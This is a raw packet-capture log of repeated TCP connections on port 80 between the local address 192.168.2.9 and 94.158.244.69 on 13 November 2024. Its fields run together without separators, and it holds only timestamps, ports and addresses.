                                                            Nov 13, 2024 10:53:20.556014061 CET804997794.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:20.556096077 CET4997780192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:20.556585073 CET4997780192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:20.556936979 CET4997780192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:20.563676119 CET804997794.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:20.563700914 CET804997794.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.045538902 CET804997794.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.045691013 CET4997780192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:29.045938969 CET4997780192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:29.051748037 CET804997794.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.592644930 CET4997880192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:29.597553968 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.597671032 CET4997880192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:29.597868919 CET4997880192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:29.598329067 CET4997880192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:29.602643013 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.602725983 CET4997880192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:29.603207111 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.603280067 CET4997880192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:29.603308916 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.603358984 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.603368998 CET4997880192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:29.603389025 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.603410959 CET4997880192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:29.603416920 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.603435993 CET4997880192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:29.603466988 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.603497028 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.603524923 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.603552103 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.607598066 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.608428001 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.608458042 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.608484983 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.608592033 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.608619928 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:29.649419069 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:38.220794916 CET804997894.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:38.624114990 CET4997980192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:38.629605055 CET804997994.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:38.629694939 CET4997980192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:38.629818916 CET4997980192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:38.630177021 CET4997980192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:38.635735989 CET804997994.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:38.636195898 CET804997994.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.122709990 CET804997994.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.122817993 CET4997980192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.122908115 CET4997980192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.127899885 CET804997994.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.802076101 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.808523893 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.808703899 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.808826923 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.809458971 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.814652920 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.814718962 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.815444946 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.815459967 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.815501928 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.815525055 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.815582991 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.815597057 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.815609932 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.815625906 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.815646887 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.815731049 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.815743923 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.815757036 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.815778017 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.815795898 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.820873976 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.820888042 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.820944071 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.821806908 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.821820974 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.821832895 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.821846008 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.821865082 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.821868896 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.821902990 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.861413002 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.861589909 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.913467884 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.914110899 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:47.965478897 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:47.967101097 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.013443947 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.013595104 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.061461926 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.061572075 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.113558054 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.113713026 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.165502071 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.165736914 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.214562893 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.214729071 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.266756058 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.266932011 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.315388918 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.315529108 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.362574100 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.363095999 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.410700083 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.410917044 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.462791920 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.462986946 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.513436079 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.513510942 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.565447092 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.565632105 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.613421917 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.613480091 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.661436081 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.661494970 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.709423065 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.709479094 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.757481098 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.757647991 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.805444002 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.805563927 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.853450060 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.853555918 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.901410103 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.901513100 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.949409962 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.949486971 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:48.997845888 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:48.997931957 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.049565077 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.049712896 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.097527027 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.097623110 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.149497032 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.149586916 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.197993994 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.198111057 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.245539904 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.245601892 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.297538996 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.297606945 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.346976042 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.347100973 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.394840956 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.395023108 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.441422939 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.441533089 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.490514994 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.490652084 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.541763067 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.541897058 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.591151953 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.591283083 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.637656927 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.637747049 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.685681105 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.685791969 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.734527111 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.734740019 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.786758900 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.786917925 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.837513924 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.837578058 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.885752916 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.885816097 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.933497906 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.933609009 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:49.983243942 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:49.983434916 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.031234980 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.031514883 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.077790022 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.077876091 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.125658035 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.125845909 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.177422047 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.177530050 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.225610018 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.225753069 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.273679018 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.273785114 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.325531006 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.325625896 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.373601913 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.373706102 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.421468973 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.421559095 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.472023964 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.472158909 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.521847963 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.521985054 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.573549986 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.573683023 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.625768900 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.625930071 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.673599958 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.673768044 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.721674919 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.721875906 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.773519993 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.773610115 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.825675964 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.825845957 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.881746054 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.881937981 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.933605909 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.933751106 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:50.985542059 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:50.985630989 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.033593893 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.033660889 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.081600904 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.081681967 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.129627943 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.129705906 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.177510977 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.177634001 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.225697041 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.225783110 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.277558088 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.277750015 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.325613022 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.325732946 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.373575926 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.373672009 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.421494007 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.421610117 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.469645023 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.469758034 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.517658949 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.517777920 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.565596104 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.565774918 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.613465071 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.613533974 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.661477089 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.661614895 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.709547043 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.709647894 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.761825085 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.761881113 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.809541941 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.809606075 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.857405901 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.857475996 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.909456015 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.909533024 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:51.957493067 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:51.957561016 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.249345064 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.249490023 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.254513979 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.254587889 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.301585913 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.301666975 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.353729010 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.353830099 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.405599117 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.405698061 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.453676939 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.453777075 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.501431942 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.501538038 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.549566031 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.549758911 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.597618103 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.599203110 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.646018028 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.646157026 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.693696976 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.693774939 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.741628885 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.741719961 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.789597034 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.789669991 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.837852955 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.837925911 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.889739037 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.889836073 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.941690922 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.941772938 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:52.993562937 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:52.993947029 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.041555882 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.041645050 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.093668938 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.093786001 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.141562939 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.141639948 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.189693928 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.189769983 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.237540007 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.237620115 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.285653114 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.285734892 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.333535910 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.333651066 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.385687113 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.386941910 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.437515974 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.437599897 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.489686966 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.494798899 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.541485071 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.541598082 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.589710951 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.595185995 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.641726017 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.643182993 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.689627886 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.691204071 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.737832069 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.738475084 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.789572954 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.789645910 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.837567091 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.837640047 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.885520935 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.885608912 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.937536001 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.937616110 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:53.985533953 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:53.985652924 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.033554077 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.033629894 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.081484079 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.081552029 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.133644104 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.133730888 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.185512066 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.185657024 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.233567953 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.233710051 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.281735897 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.281914949 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.330526114 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.331252098 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.377649069 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.377733946 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.429718971 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.429917097 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.481672049 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.481893063 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.529695034 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.529881001 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.577399969 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.577501059 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.625716925 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.625797033 CET4998080192.168.2.994.158.244.69
